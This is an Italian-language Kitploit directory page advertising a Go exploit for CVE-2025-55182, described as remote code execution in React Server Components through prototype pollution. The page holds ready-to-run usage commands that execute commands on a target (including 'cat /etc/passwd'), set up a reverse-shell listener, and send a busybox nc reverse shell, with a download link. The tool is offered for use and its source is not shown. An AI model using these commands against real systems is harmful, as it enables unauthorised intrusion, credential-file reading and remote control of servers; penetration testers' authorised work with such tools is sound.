Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-in-go — Exploit basato su Go per CVE-2025-55182, che consente l'esecuzione di codice remoto in React Server Components tramite inquinamento del prototipo. Supporta l'esecuzione arbitraria di comandi e payload di reverse shell. | Kitploit
Strumenti/GitHubGitHub/w3nch/cve-2025-55182-in-go
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubw3nch/cve-2025-55182-in-go

CVE-2025-55182-in-go

Exploit basato su Go per CVE-2025-55182, che consente l'esecuzione di codice remoto in React Server Components tramite inquinamento del prototipo. Supporta l'esecuzione arbitraria di comandi e payload di reverse shell.

Vedi Repository
23 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 — React Server Components RCE

Exploit per RCE in React Server Components tramite prototype pollution.

Utilizzo

root@kitploit:~
go run main.go -t <target> -c <command>

Esempi

root@kitploit:~
go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"

Reverse shell

Configurazione della reverse shell

root@kitploit:~
penelope -i 0.0.0.0 -p 1337

Usa busybox:

root@kitploit:~
go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"

Compilazione

root@kitploit:~
go build -o exploit .

Note

  • HTTPS viene aggiunto automaticamente se lo schema è mancante
  • L'output del comando è codificato in base64 nella risposta
  • I redirect sono intenzionalmente disabilitati
Scarica lo strumento